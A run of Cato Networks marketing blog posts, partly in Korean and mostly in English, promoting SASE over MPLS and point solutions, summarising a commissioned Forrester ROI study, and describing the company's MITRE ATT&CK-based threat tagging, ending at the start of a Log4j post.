오늘날 조직들은 보안 및 네트워크 서비스를 관리하는 데 어려움을 겪고 있기 때문에 이러한 결과는 매우 중요합니다. 조직들은 VPN, 인터넷 및 WAN 등에 대한 전담팀을 갖추고 있는데, 이러한 팀은 각 네트워크 사이트에서 업데이트를 개별적으로 관리해야 합니다. 이 작업에는 많은 시간과 비용이 소모됩니다. 장기적으로 볼 때, 기업이 디지털 방식으로 전환하고 경쟁 우위를 유지하며 고객에게 최상의 서비스 제공하는 것이 어려워집니다.
주요 결과를 더 깊이 있게 살펴보겠습니다.
운영 및 유지관리 비용 절감
이 연구는 Cato Networks를 이용할 때 3년 동안 운영 및 유지관리 비용이 감소하여 380만 달러를 절약할 수 있다고 밝혔습니다. 네트워크 및 보안 엔지니어는 시스템 최적화 대신 시스템 관리에 많은 시간을 할애하기 때문에 이 목표는 여러 조직의 이해관계자에게 매우 중요합니다.
“전체 Cato 대시보드를 기반으로 SD-WAN 솔루션을 설정하고 유지관리하는 것이 얼마나 쉬운지 확인하고 정말 깜짝 놀랐습니다. 이전 솔루션을 사용하면, 설정하는 데 10명의 엔지니어가 필요하고 계속 실행하는 데 20명의 엔지니어가 필요하다는 말이 있습니다. Cato를 사용하면 이 모든 걱정이 사라집니다. 비결은 대시보드에 있습니다. 한 시간 이내에, 배경 아이디어를 이해한 다음 바로 작업을 수행할 수 있습니다.”
- IT 관리자, 자동차 부품 제조업체
구성 시간 단축
기업이 확장되고 어디서나 직원과 고객을 연결하기 위한 유연성이 필요하게 되면서, 설정 및 구성 시간은 네트워크 및 보안 솔루션을 선택할 때 중요한 고려 사항이 되었습니다. 연구에 따르면, Cato Network는 3년 동안 약 44,000달러와 관련 인력의 막대한 시간을 절약합니다.
“우리는 또 다른 일을 추진하고 있었습니다. 합병과 다양한 지역 진출, 잦은 사무실 이전 등으로 ‘박스 안의 오피스’가 필요했습니다. 우리 팀이 ‘박스’를 배송하기만 하면 적당한 역량을 갖춘 개인이 도면을 따라 연결하고 관리 포털을 표시하여 바로 업무를 시작할 수 있는, 즉 실행 후 잊어버릴 수 있는(fire- and-forget) 유형의 관리평면 분리 접근법이 필요했습니다.”
- 기술, 자문, 세무 및 보증 담당 이사
시스템 폐기에 따른 절감
값비싼 하드웨어는 IT 및 보안팀에 매우 심각한 문제입니다. 유지관리, 업그레이드, 수정, 다른 플랫폼과의 통합 등이 필요하기 때문입니다. SASE로 마이그레이션하고 기존 시스템을 폐기하면 조직은 3년 동안 Cato를 이용하여 220만 달러를 절약할 수 있습니다.
“인텔리전스와 보안 계층을 갖춘 Cato 전송에서 우리가 해야 할 모든 작업이 수행되기 때문에 다른 솔루션에 투자할 필요가 없습니다.”
- 기술, 자문, 세무 및 보증 담당 이사
보고서에 따르면, Cato Networks는 다음과 같은 수량화할 수 없는 추가 이점도 제공합니다.
시간 및 운송 비용 절감 - 원격 사이트로 장비를 운송하는 시간과 비용을 절약합니다.
보안 태세 강화 - 조직 전반에 걸쳐 보안 규칙 세트의 일관성을 보장합니다.
애플리케이션 성능 개선 - 실무자가 업무를 더 빨리 완료할 수 있도록 지원합니다.
직원 사기 향상 - 기술, 자문, 세무 및 보증 담당 이사는 다음과 같이 전했습니다. “회사에서 직접 배포하려고 하면 작업에 필요한 소요시간 때문에 직원들이 반발한다는 점을 잘 알고 있습니다. 솔루션은 배송, 구성, 즉각 실행 등 모든 게 간편하기 때문에 엔지니어들이 정말 좋아합니다.”
유연성 - 인프라를 추가할 필요 없이 새로운 모바일 사용자를 추가하고 사이트를 빠르게 배포할 수 있습니다.
전체 보고서 읽기
Cato Networks를 이용하여 기업이 디지털 방식으로 전환하는 방법을 더 심층적으로 알아보려면 전체 보고서를 읽어보시기 바랍니다. 보고서에는 모든 재무 정보, 추가 견적 및 사용 사례, 비용 및 절감액 분석이 수록되어 있으므로 Cato Network의 비즈니스 효과를 더 심층적으로 이해할 수 있습니다. 보고서를 읽으려면 여기를 클릭하세요.
SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead. Ever...
8 Reasons Enterprises are Adopting SASE Globally SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead.
Ever since SASE was coined as a category by Gartner in 2019, the global adoption of SASE has grown significantly. Here are eight drivers and global trends that are driving this change.
This blog post is based on the e-book “8 SASE Drivers for Modern Enterprises”.
8 SASE Drivers for Modern Enterprises
1. Enabling the “Branch Office of One”
Thanks to mobile devices and constant connectivity, employees can stay connected at all times and work from anywhere. This has turned them into a “branch office of one”, i.e a fully functional business unit, consisting of one person.
The remote working trend has been intensified by COVID-19, which has significantly enhanced its adoption. Some form of working from home is probably here to stay. McKinsey found that 52% of employees would prefer a flexible working model even after COVID.
Therefore, IT and security teams are adopting SASE solutions to enable these “branches of one” to work seamlessly and securely. SASE optimizes traffic to any edge while continuously inspecting traffic for threats and access control. This ensures all employees anywhere are productive, can access all company assets and can communicate with all employees and partners, at all times.
2. Direct-to-Internet Branch Access
Traditional branch offices are also evolving. Many employees have a constant need to communicate with others across the world and to connect to global cloud infrastructures, platforms and applications. So while these employees might be sitting together physically, they are de facto a collection of branch offices of one, with intensive communication and security requirements.
IT and security teams are implementing SASE solutions to enable high-performance to the cloud for these employees. SASE provides SD-WAN capabilities and a global private backbone that replaces the costly MPLS and the erratic Internet.
[boxlink link="https://www.catonetworks.com/resources/8-sase-drivers-for-modern-enterprises/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_sase_drivers"] 8 SASE Drivers for Modern Enterprises | eBook [/boxlink]
3. Consolidating Vendors
The growing number of network and security requirements has flooded the market with vendors and point solutions. IT and security teams are having a difficult time figuring out which platform can answer their exact needs, both now and in the future. In addition, integrating and managing all these solutions creates time-consuming complexities and overhead.
SASE is being adopted as a single, user-friendly converged solution for all network and security needs, now and in the future. With a single console for configuration, management and reporting - visibility and management capabilities are improved. In addition, implementing one security solution enables enforcing a single set of policies across the entire network and reducing the attack surface.
4. Adopting Zero Trust
Zero trust is a security model in which users are continuously authenticated before they are given access to assets or apps. It is based on the premise of “never trust, always verify”, to ensure the principle of least privilege is enforced and attackers can’t gain access to sensitive assets. Zero trust is essential for securing a global, dispersed workforce that connects remotely and not from the physical, enterprise network.
The mindset of IT and security teams is shifting, from securing physical locations to connecting and securing users and devices. Zero trust is deployed as part of SASE as a solution to access needs. By using simple mobile client software or clientless browser access, users connect dynamically to the closest SASE PoP, where their traffic is routed optimally to the data center or application. There, it is authenticated before providing access.
Check out the full ebook to view the entire list and four additional SASE drivers.
The Future of Enterprise Networks
Agile solutions that provide secure, global access with high performance are driving global digital transformation. It is becoming evident, however, that point solutions can't meet all the enterprise needs. These changes are driving the adoption of SASE, a convergence of network and security functions that drives traffic through a global network of local PoPs.
With SASE, traffic is sent to the local SASE PoP. Once traffic enters the PoP, SASE applies network and security policies and forwards it over an optimized, global, private backbone. The SASE cloud service takes care of delivering and managing a comprehensive security stack, including upgrades and security updates, for all connected users and cloud resources.
The result is optimized, secure and high performing traffic that drives business agility.
CATO Networks is Driving SASE Globally
Cato pioneered the convergence of networking and security into the cloud. Aligned with Gartner's Secure Access Service Edge (SASE) framework, Cato's vision is to deliver a next generation secure networking architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches based on disjointed point solutions. With Cato, organizations securely and optimally connect any user to any application anywhere on the globe. Our cloud-first architecture enables Cato to rapidly deploy new capabilities and maintain optimum security posture, without any effort from the IT teams. With Cato, your IT organization and your business are ready for whatever comes next.
See the ebook “8 SASE Drivers for Modern Enterprises”.
The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging...
5 Strategic Projects for Strategic CIOs The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging technology, can transform their organization.
Let’s look at five strategic projects that can help CIOs drive innovation and generate new revenue streams.
Project #1: Migrating MPLS or SD-WAN to SASE
Many organizations have replaced their MPLS with SD-WAN, or are in the process of doing so. SD-WAN emerged a few decades ago as a cost-effective replacement to MPLS, because it answers MPLS constraints like capacity, cost and lack of flexibility. However, SD-WAN does not provide solutions for modern requirements like security threats, remote work, global performance and cloud-native scalability.
SASE (Secure Access Service Edge) is the next step after SD-WAN. A Gartner-coined term, SASE is the convergence of SD-WAN, network security and additional IT capabilities into a global, cloud-native platform. Compared to SD-WAN and other point solutions, SASE ensures reliability, performance, security and connectivity.
In fact, according to Gartner’s Hype Cycle of Network Security 2020 - by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020.
How CIOs Create Business Value with SASE:
By migrating to SASE, CIOs ensure all employees will always be able to connect via a secure, global and performance optimized network. With SASE, CIOs are also relieved from the complexity and risk of supporting the business with point solutions, which are often outdated.
Project #2: Building Cloud Native Connectivity
Cloud-native infrastructure, platforms and applications provide businesses with flexibility, scalability and customizability. They also increase the speed and efficiency of processes.
Technological advancements have enabled this transition, but it is the growing need for remote accessibility and global connectivity that is accelerating it. On-premises solutions can no longer answer modern business needs for performing business activities.
SASE is a cloud-native technology, providing businesses with all the benefits of the cloud and connecting all edges, branches, users and data centers.
How CIOs Create Business Value with Cloud Native Connectivity
By building cloud native connectivity across all edges, CIOs provide employees with optimized performance, security and accessibility to any required internal or external business application. Cloud readiness also enables agile delivery to customers.
[boxlink link="https://www.catonetworks.com/resources/deploy-your-site-in-under-6-minutes/?utm_source=blog&utm_medium=top_cta&utm_campaign=6_minute_demo"] Deploy your site in under 6 minutes with Cato SASE Cloud! | Check it out [/boxlink]
Project #3: Implementing a Full Security Stack in the Cloud
Cyber attacks are becoming increasingly more sophisticated, widespread and with the potential to create more destruction. Coupled with the dissolvement of network borders, IT and security teams need to rethink their security strategy and solutions.
Existing point security solutions simply cannot keep up with all these changes. In addition, the overhead tax IT and security teams pay for finding, purchasing, managing, integrating and updating various security solutions from numerous vendors is very high.
A converged security solution implements innovative security models, like ZTNA (Zero Trust Network Access) alongside security measures like threat prevention and decryption. In addition, it is automatically updated, to ensure it can thwart CVEs and zero day threats.
How CIOs Provide Business Value with Full Stack Cloud Security
By implementing a complete security stack in the cloud, CIOs provide the company’s employees and customers with the confidence that their information is secure and accessible only to authorized users and services. In addition, IT and security teams regain peace of mind to operate with confidence and stress free.
Project #4: Enable Access to All Edges
Working remotely from home, the road or a different office is becoming increasingly popular, and is turning into a working model that is here to stay. In addition, the global distribution of networks has also introduced many new entry points to business systems. But, traditional access capabilities are not designed for these types of connectivity models.
SASE provides dynamic and secure access through global PoPs (Points of Presence). Traffic from remote users, data centers, applications or other edges is automatically detected and sent to the nearest PoP. There, it is authorized and then given access.
How CIOs Provide Business Value with Global Access to All Edges
By providing users with secure access while ensuring first-class citizen performance, CIOs become enablers for business agility and speedy deliveries. The freedom and flexibility to work from anywhere and connect to anywhere power new opportunities for business initiatives. In addition, they provide employees with working conditions fit for modern life and ensure they will not look elsewhere for an employer that enables working remotely.
5. Optimize Routing with Global Connectivity
Businesses today route high volumes of traffic, from globally dispersed employees and other edges. Performance optimization is essential for connectivity and communication so employees can get things done. However, the Internet is too erratic to be relied on, and SD-WAN providers are forced to integrate with third party backbone providers for such optimization.
SASE solutions provide a global backbone and WAN optimization, serving IT and security capabilities to all users and accelerating east-west and northbound traffic to the cloud.
How CIOs Provide Business Value with Optimized Global Connectivity
By ensuring low latency and optimized routing, CIOs are fulfilling a key requirement for business agility. From video streaming to accessing information to transferring data, optimized routing facilitates and powers business activities.
How to Get Started
Looking at this list might be daunting at first. However, all these projects can be achieved through the implementation of SASE. SASE converges network and security point solutions into a single, global, cloud-native platform that enables access from all edges. Therefore, it provides a single and streamlined answer to all network and security needs, now and in the future.
Cato is the world’s first SASE platform. Using the Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.
You can read more from the following resources:
Your First 100 Days as CIO: 5 Steps to Success
5 Things SASE Covers that SD-WAN Doesn’t
What is SASE?
The Hybrid Workforce: Planning for the New Working Reality
MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next. What is MPLS? MPLS (Multiprotocol...
Pros and Cons of MPLS: Is It Right for Your Network? MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next.
What is MPLS?
MPLS (Multiprotocol Label Switching) is a network routing technique that is based on predetermined paths, instead of routers determining the next hop in real-time. This enables quicker and more efficient routing, as the router only needs to view a packet label, instead of looking up the address destination in complex routing tables. In addition, using MPLS requires setting up a dedicated connection. It is de facto a private network.
How does MPLS Work?
In MPLS, when a data packet enters the network, it is assigned a data label by the first router in the path. The label predetermines the path the packet needs to follow. It includes a value, as well as additional fields to determine the quality of service required, the position of the label in the stack and time-to-live. Based on this label, the packet is routed to the next router in its path.
The second router that receives the packet then reads this label and uses it to determine the following hop in the network. It also removes the existing label from the packet and adds a new one. This process is repeated until the data packet reaches its destination. The last router in the path removes the label from the data packet.
Since the path is predetermined, the routers only need to read the label and do not need to check the packet’s IP address. This enables faster and more efficient routing.
MPLS routing terms:
Label Edge Router (LER) - the first or last routers that either assign the first data label and determine the path or pop the label off the packet. The first router is also known as Ingress Label Switching Router (Ingress LSR) and the last as Egress LSR.
Label Switching Router (LSR) - the routers along the path that read the labels, switch them and determine the next hop for the packets.
Label Switching Path (LSP) - the path the packets are routed through in the network
Now let’s look at the advantages and disadvantages of MPLS routing.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=wont_tell_you_about_mpls"] What Others Won’t Tell You About MPLS | Find Out [/boxlink]
MPLS Advantages & Benefits
MPLS provides multiple advantages to network administrators and businesses. These include:
Routing based on labels over a private network ensures that packets will be reliably delivered to their destination. In addition, MPLS enables prioritizing traffic for different types of packets, for example routing real-time, video packets through a lower latency path. This reliability is guaranteed through service level agreements (SLAs), which also ensure the MPLS provider will resolve outages or pay a penalty.
MPLS dedicated infrastructure assures high-quality, low latency and low jitter performance. This ensures efficiency and a good user experience. It is also essential for real-time communication, like voice, video and mission-critical information.
However, there are also disadvantages to MPLS.
MPLS services are expensive, due to their commitment to ensure high bandwidth, high performance and competitive SLAs. Deployments and upgrades of the required private connection can also turn into a resource-intensive process.
MPLS is built for point-to-point connectivity, and not for the cloud. Therefore, the WAN does not have a centralized operations center for reconfiguring locations or deploying new ones and does not enable quick scalability.
Does Not Support All Edges
MPLS cannot be extended to the cloud since it requires its own dedicated infrastructure. Therefore, it is not a good fit for remote users or for connecting to SaaS applications.
MPLS is a trustworthy solution for legacy applications in enterprises. However, the transition to the cloud and remote work require businesses to reconsider their network strategy and implement more cost-effective and efficient solutions. Alternatives like SASE (Secure Access Service Edge) combine all the advantages of MPLS, SD-WAN and more.
To learn more about SASE and to see how it improves your MPLS connectivity, contact us.
Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams. The question is...
Total Economic Impact™Study: Cato Delivers 246% ROI and $4.33 Million NPV Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams.
The question is - are we living up to our goals?
To help us and our potential customers gauge the potential impact and ROI of Cato Networks, we commissioned Forrester Consulting to conduct a Total Economic Impact (TEI) study. To be completely honest, even we were blown away by the success these companies achieved through the Cato SASE Cloud.
The study shows how Cato Networks is helping reduce costs, eliminate overhead, retire old systems, enhance security, improve performance and create higher employee morale.
Some of the key findings Forrester found, were that by using Cato, a composite organization can enjoy:
$4.33 million NPV
Payback in less than 6 months
$3.8 million saved on reduced operation and maintenance
Almost $44,000 saved on reduced time to configure Cato on new sites
$2.2 million saved by retiring systems that Cato replaces
Reduced time and transit cost
This matters because today organizations are struggling with managing security and network services. They have dedicated teams for VPN, internet and WAN, and more, which need to individually manage updates at each network site. This is time-consuming and costly. In the long run, this prevents the business from transforming digitally, maintaining a competitive advantage and delivering the best services they can to their customers.
Let’s dive into some more of these key findings.
[boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks?utm_source=blog&utm_medium=top_cta&utm_campaign=tei"] The Total Economic Impact™ of Cato Networks | Read The Full Report [/boxlink]
Reduced Operation and Maintenance Costs
The study revealed that Cato Networks enables saving $3.8 million in reduced operation and maintenance costs over three years. This objective is extremely important for multiple organization stakeholders, as network and security engineers spend a lot of time managing systems instead of optimizing them.
“Honestly, I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. Now there’s a saying that with [the previous solution], you need 10 engineers to set it up and 20 engineers to keep it running. With Cato, this all went away. It’s in the dashboard. Within the hour, you understand the idea behind it and then you can just do it.”
- IT manager, motor vehicle parts manufacturer
Reduced Configuration Time
With companies scaling and requiring flexibility to connect employees and customers from anywhere, setup and configuration time has become an important consideration when choosing a network and security solution. According to the study, Cato Network saves nearly $44,000 and a huge number of manual hours over three years.
“The other thing that we were driving towards was, because we do mergers, because we do a lot of office moves, [because] we go into different geographies, I wanted an ‘office in a box,’ fire- and-forget sort of management plane separation approach where my team could do a lot with just shipping a box out [and] having a reasonably intelligent individual follow a diagram, plug it in, have it light up in a management portal, and we're in business.”
- Director of technology, advisory, tax and assurance
Savings From Retired Systems
Expensive hardware is a huge pain for IT and security teams. It requires maintenance, upgrades, fixes and integrations with other platforms. By migrating to SASE and retiring old systems, organizations can save $2.2 million dollars with Cato, over three years.
“We don’t need to go invest in those other solutions because the Cato transport with the intelligence and the security layer does everything we need it to do.”
- Director of technology, advisory, tax and assurance
According to the report, Cato Networks also provides additional, unquantifiable benefits, like:
Reduced time and transit costs -Saving time and money transporting the equipment to remote sites.
Increased security posture - By ensuring the consistency of security rule sets across the organization.
Better application performance - Enabling practitioners to get their work done faster.
Higher employee morale - According to a director of technology, advisory, tax and assurance: “I know that if I tried to roll it back in my firm, [the employees] would revolt because of the speed it gets. My engineers love it because you ship it, we’ll configure it, it shows up, and we’re off to the races.”
Flexibility - The ability to add new mobile users without the need to add infrastructure and to deploy sites quickly.
Read the Complete Report
You’re welcome to read the complete report to dive deeper into how businesses can digitally transform with Cato Networks. It has all the financial information, more quotes and use cases, and a breakdown of costs and savings to help you gain a more in-depth understanding of Cato Network’s business impact. Read the complete TEI report.
To speak with an expert about how you can achieve such ROI in your company, contact us.
As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and letting them be one...
Why Cato Uses MITRE ATT&CK (And Why You Should Too) As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and letting them be one step ahead.
With the traditional IoC-based approach, the assumption is that whenever adversaries use some specific exploit it will generate some specific data. It could be an HTTP request, a domain name, a known malicious IP, and the like. By looking at information from sources such as application logs, network traffic, and HTTP requests enterprises can detect these IoCs and stop adversaries from compromising their networks.
In 2020 there were about 18,000 new CVEs reported and in 2021 there were about 20,000, as this trend continues the number of IoCs that are discovered becomes unmanageable and many of them can be modified in small ways to avoid detection. What’s more, as we will show in this blogpost, IoCs are not even the full security picture, representing a small portion of the attacks confronting enterprises. All of which suggests that security professionals need to expand their methods of detecting and stopping attacks.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help [eBook] [/boxlink]
TTPs: The New Approach to Detecting Attacks
The security community has noticed this trend and has started shifting from IoC-based detection to understanding adversaries’ Tactics, Techniques, and Procedures (TTPs). Having identified TTPs, security vendors can then develop the necessary defenses to mitigate risk.
Many tools have been developed to help understand and map these TTPs, one such tool is MITRE’s ATT&CK Framework.
ATT&CK is a collaborative effort involving many security vendors and researchers. The project aims to map adversary TTPs to help create a common language for both red and blue teams.
ATT&CK contains a few different matrices, each with its own sector. In the enterprise matrix, which is focus of our work, there are 14 “tactics.” A “tactic” is a general goal that the adversary is trying to accomplish, under each tactic there are several “techniques.” A “technique” is the means the adversary uses to accomplish his tactic, it is a more technical categorization of what the adversary may do to implement his tactic. Each technique can appear under multiple tactics and can be further divided into sub-techniques. Some tactics can be seen across the network with Reconnaissance, Initial Access, Execution, and Exfiltration associated with the network’s perimeter.
To better understand the value of ATT&CK, look at “The Pyramid of Pain,” which shows the relationship between the types of indicators you might use to detect an adversary's activities and how hard it will be for them to change them once caught. TTPs being the hardest to change thus causing more pain to the adversary if detected.
[caption id="attachment_22591" align="alignnone" width="2080"] This diagram shows us in a simple manner why aiming to identify TTPs can be more beneficial and improve defenses against adversaries rather than those focusing on IoCs.[/caption]
As enterprises shift from reactive and IoC-based security, which heavily relies on processing IoCs from threat intelligence feeds, to TTP-based security, which requires a proactive approach based on research, enterprise security becomes more challenging. At the same time, TTP-based security brings numerous benefits. These include better visibility into one’s security posture, better understanding of security risks, and an improved understanding of how to expand security capabilities to better defend against real adversaries.
Cato Implements MITRE ATT&CK
Cato has implemented the MITRE ATT&CK methodology of identifying and protecting against TTPs on top of the traditional IoCs. We incorporated this ability into our product by implementing a tagging system that tags each security event with the relevant ATT&CK tactics, techniques, and sub-techniques. This allows customers to visualize and understand what threats they face and what attack flows they are vulnerable to, further enabling them to understand where to improve their insight, and what TTPs their adversaries are using.
[caption id="attachment_22593" align="alignnone" width="1358"] A view of an event that is mapped to ATT&CK in the Cato Cloud[/caption]
So, what did implementing a TTP-based approach reveal to us?
As we dove into the details of our signatures, we saw that we could divide them into two main approaches:
IoC-based - Covering a specific vulnerability using well-defined IoCs.
TTP-based - Covering a behavior of an adversary.
We started by looking at our products’ coverage over the entire ATT&CK matrix and trying to understand where we are most vigilant and where we are less so. Our scope was the most common threats we cover (in our customers’ networks), and new threats we covered from the last year.
After going through this process and creating a visualization of our threat protection with the ATT&CK Navigator, we found that Cato Cloud provides protection across all stages of the attack flow with particular strengths in the Initial Access and Execution stages.
[caption id="attachment_22595" align="alignnone" width="2708"] Cato’s protection capabilities mapped onto the ATT&CK matrix. The darker the color, the more vulnerabilities Cato protects against in that technique. (For simplicity, sub-techniques are not shown.)[/caption]
We should not be satisfied with this data alone, while signature numbers and mappings are an insightful metric, the real insights should be derived from events in the field. So, we then examined Cato’s defenses based on the actual events of exploitation attempts in each ATT&CK technique. Our sampling looked at a two-week period spanning some 1,000 networks.
[caption id="attachment_22597" align="alignnone" width="2928"] Cato’s security events mapped onto the ATT&CK Matrix. Again, the darker the color the more events found to be using that technique in the last two weeks. Sub-techniques are not shown to keep it simple.[/caption]
From this mapping, we can see two things.
Most events are from scanning techniques, this is expected as a single scan can hit many clients with many protocols and generate many events.
We see events from many different techniques and tactics, which means that covering more than just the perimeter of the network does increase security as adversaries can appear in any stage of the attack flow and should never be assumed to exist only in the perimeter.
Putting aside scans, we found that TTP-based signatures identified far more security events than the IoC-based signatures did. Below is a table mapping the percentage of events identified by TTP-based (ATT&CK) and IoC-based approaches over our sampling period. Looking at the table, three techniques represent 87% of all events in the last two weeks. Counting the signatures, we saw that on average 78% of all signatures were IoC-based and only 22% were TTP-based.
[caption id="attachment_22635" align="alignnone" width="632"] Top 3 techniques based on number of events, excluding scans.[/caption]
But when we looked at the number of total events, we noticed that on average 94% are TTP-based and only 6% are IoC-based, this affirms our TTP-based approach’s effectiveness in focusing on those areas of actual importance to organizations.
TTP: Lets You Focus on Quality Not Chase Quantity
Focusing on TTP-based signatures provides a wide angle of protection against unknown threats, and the potential to block 0-days out of the box. On top of 0-days, these signatures cover past threats just as well, giving us a much greater ratio of threats covered per signature.
The IoC-based approach is less valuable, identifying fewer threats confronting today’s enterprises. TTP-based signatures prove to save production time by having a better protection for less effort and giving us more confidence in our coverage of the ATT&CK Matrix.
What’s more, when covering IoC-based signatures, the focus is on the number of signatures, which does not necessarily result in better security and might even lead to a false sense of one. The bottom line is that one good TTP-based signature can replace 100 IoC-based ones, allowing enterprises to focus on quality of protection without having to chase quantity of threats.
Survey Reveals Confusion about the Promise of SASE Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to...
Security or Performance Survey Reveals Confusion about the Promise of SASE
Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to – choose between security and performance.
Nothing too earth-shattering there; Gartner and other industry leaders have long reached the conclusion that Secure Access Service Edge (SASE) is the suitable network to support both security and performance needs of the digital business. So, unless using SASE, enterprises would inevitably end up having to compromise between the two.
But here’s what is shattering (and particularly confusing): Albeit the fact that the essence of SASE is never having to choose between security and performance; the 8.5% of respondents already using non-Cato’s SASE revealed an unavoidable need to compromise between them – similar to non-SASE users.
Why the Confusion?
We believe this confusion is due to vendors claiming to provide a SASE platform, where in reality they’re merely offering a portfolio of point solutions, packaged into what they misleadingly call SASE. This state was anticipated by Gartner with an explicit warning that “vendor hype complicates the understanding of the SASE market.”1
A true SASE solution – one that supports both security and performance requirements – must converge SD-WAN and cloud-native security services (FWaaS, SWG, CASB, SDP/ZTNA) in a unified software stack with single-pass processing. This approach boosts performance, increases security, and reduces overall network complexity. Deploying point-solutions patched together from so-called SASE vendors, doesn’t add up to a real SASE service. This can’t offer the enhanced security and optimized performance of a converged platform. Yet, this is the SASE service respondents know, hence their confusion is apparent across the survey.
For example, when asked how they react to performance issues with cloud applications, reactions of SASE and non-SASE users were similar. 67% of SASE users would add bandwidth, and 61% of non-SASE users claimed the same. 19% of SASE users would buy a WAN optimization appliance, as 21% of non-SASE users indicated as well.
Evidently SASE users are still suffering from performance issues, and they are forced to add point solutions accordingly. This slows down performance and makes their network more complex and less secure.
Confusion on this topic was even more noticeable among SASE users, where 14% (compared to 9% among non-SASE users) admitted they simply don’t know what to do in case of performance issues. Here are some examples of answers: “Ignore and pray it goes away,” “wait it out – ugh,” “suffer through it,” “don’t know,” and “not sure.”
Improving remote access performance was one of the three main business priorities for all respondents. This makes perfect sense in the new work-from-everywhere reality; and this is one of the most straightforward use cases of SASE. Yet even here, SASE and non-SASE users experience the same problems. 24% of SASE users vs. 27% of non-SASE users complain about poor voice/video quality. Slow application response received the same 50% from both SASE and non-SASE users.
Respondents were also asked to rate the level of confidence in their ability to detect and respond to malware and cyber-attacks. Here too, results across the board were highly comparable. On a scale of
1-10 the average answer for SASE users was 4, and for non-SASE users 3.
Both answers indicate a low level of confidence in dealing with critical situations that can severely impact the network. Although Gartner claims that SASE is the future of network security, for these respondents it’s as if having SASE makes no difference at all.
[boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks?utm_source=blog&utm_medium=top_cta&utm_campaign=tei"] What to expect when you’re expecting…SASE | Find Out [/boxlink]
Making Sense of the Confusion
Respondents already using SASE are confused – and probably disappointed – from their first experience with what was presented to them a SASE service. Be aware of vendors that take an appliance, convert it to a virtual machine, host it in the cloud and call it SASE. Unfortunately, this sounds like trying to deliver a Netflix-like service from stacking thousands of DVD players in the cloud. And, from the very beginning, Gartner advised to “avoid SASE offerings that are stitched together.”
We’re honored that Cato SASE Cloud users present the flip side of this confusion. Aligned with Gartner’s SASE framework, we deliver a converged, cloud-native platform that is globally distributed across 70+PoPs, and covers all edges. As opposed to confused respondents using so called SASE services, our customers clearly understand the value of SASE and have no dilemma when it comes to security and performance. SASE is not a trade-off between performance and security efficacy, but rather the convergence of both.
“With Cato, we could move people out from our offices to their home, ensuring the same security level, performance.”
“The big difference between Cato and other solutions is the integration of network management and security.”
“Cato provides us with a platform for delivering the networking and security capabilities that help our users increase their productivity.”
“The business is moving very fast. Now with Cato we can match that speed on the network side.”
What about all those non SASE users? What’s their strategy?
Only 29% indicated they have no plans to deploy SASE.
Clearly, respondents realize the value of SASE and admit that SASE is a must; the question for them isn’t if to migrate, but rather when. This is also in line with Gartner’s prediction that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption.” Let’s hope these respondents are introduced to true SASE offerings and enjoy both security and performance. No compromising…
On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level. To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from...
